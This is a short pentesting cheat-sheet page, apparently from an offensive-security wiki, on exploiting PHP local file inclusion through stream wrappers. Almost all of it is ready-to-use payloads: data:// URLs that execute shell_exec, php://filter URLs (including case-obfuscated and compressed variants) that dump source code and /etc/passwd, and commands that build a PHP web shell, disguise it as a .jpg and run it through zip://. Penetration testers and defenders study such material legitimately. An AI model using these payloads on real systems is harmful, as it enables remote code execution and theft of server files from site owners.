Data wrappers

#POC

http://192.168.177.10/menu.php?file=data:text/plain,hello world

#If test is successful we can further push the vulnerability launching a php wrapped command

http://10.10.10.10/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
#change syntax for Windows/'Nix targets

#Rot13 - base64 wrappers

http://target.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://target.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://target.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php

Can be chained with a compression wrapper.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd

#ZIP LFI wrapper

echo "<?php system($_GET['cmd']); ?>" > payload.php;  
zip payload.zip payload.php;   
mv payload.zip shell.jpg;    
rm payload.php   

http://target.com/index.php?page=zip://shell.jpg%23payload.php

#Expect wrapper

#Assorted commands

PrevioushaklistgenNextReverse shells

Last updated